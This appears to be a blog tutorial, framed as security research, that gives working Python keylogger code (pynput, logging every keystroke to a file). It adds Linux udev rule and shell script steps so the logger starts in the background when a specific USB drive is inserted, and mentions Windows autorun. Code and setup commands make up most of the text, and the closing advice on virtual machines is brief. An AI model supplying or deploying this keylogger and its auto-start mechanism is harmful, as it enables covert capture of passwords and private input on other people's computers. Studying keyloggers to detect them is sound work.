Building a Python Keylogger: A Security Researcher’s development to Understanding Keystroke Logging
Setting up USB Autorun (for testing):
-
Windows: You would need an
autorun.inffile on the USB, but keep in mind this is typically disabled by default for security. -
Linux/macOS: You can set up a udev rule on Linux that triggers a script when a USB drive is inserted.
Here’s an example of how you might trigger your Python script on Linux when a USB drive is inserted using udev rules.
Steps for Linux Setup:
-
Create udev rule: First, create a udev rule to detect the USB drive and execute the Python script.
Create the file
/etc/udev/rules.d/99-usb-keylogger.rules:sudo nano /etc/udev/rules.d/99-usb-keylogger.rulesAdd the following content:
ACTION=="add", ATTRS{idVendor}=="XXXX", ATTRS{idProduct}=="YYYY", RUN+="/path/to/keylogger.sh"Replace
XXXXandYYYYwith the actual vendor ID and product ID of your USB. You can find them by runninglsusbafter inserting the USB. -
Create a shell script to run the Python keylogger:
Save this file as
keylogger.shin/path/to/keylogger.sh(make sure the path matches the udev rule):#!/bin/bash python3 /path/to/keylogger.py &Make the script executable:
chmod +x /path/to/keylogger.sh -
Test: When you plug in the USB drive, the
keylogger.shscript should be triggered, which in turn starts the Python keylogger.
Python Keylogger (Same as Above):
from pynput.keyboard import Key, Listener
log_file = "/path/to/keystrokes.txt"
def on_press(key):
try:
with open(log_file, "a") as f:
f.write(f"{key.char}")
except AttributeError:
with open(log_file, "a") as f:
f.write(f" [{key}] ")
def on_release(key):
if key == Key.esc:
return False
with Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
Testing Environment
To safely test these kinds of setups:
- Use a virtual machine: This ensures that any experiments are isolated and won’t affect your main system.
- Have clear logs: Log all activity to better understand the behavior and outcomes.